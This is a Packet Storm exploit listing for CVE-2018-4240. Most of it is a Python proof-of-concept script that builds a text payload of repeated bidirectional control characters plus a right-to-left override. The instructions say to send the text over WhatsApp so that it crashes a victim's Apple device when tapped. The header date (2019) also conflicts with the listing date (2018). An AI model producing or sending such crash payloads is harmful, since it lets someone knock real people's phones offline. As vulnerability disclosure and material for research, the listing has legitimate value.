Apple macOS 10.13.4 Denial Of Service

2018-09-12T00:00:00
ID PACKETSTORM:149330
Type packetstorm
Reporter Sriram
Modified 2018-09-12T00:00:00

Description

                                        
                                            `# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)  
# Date: 2019-09-10  
# Exploit Author: Sriram (@Sri_Hxor)  
# Vendor Homepage: https://support.apple.com/en-in/HT208848  
# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0  
# CVE : CVE-2018-4240 (2018)  
# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf  
  
# Crashing Phone via RLM character.   
# Steps to Reproduce,   
  
# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"  
# Copy the text from the generated apple.txt  
# Paste it in WhatsApp and send it, victim gotta click and it will start crashing  
  
end = "‮ereh-hcuot-t'nod"  
dos = "‎‏"  
payload = dos*1000 + end  
try:  
f=open("dos_apple.txt","w")  
print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))  
f.write(payload)  
f.close()  
print "[+] File created!"  
except:  
print "Can't create a file, check DIR permissions?"  
  
  
`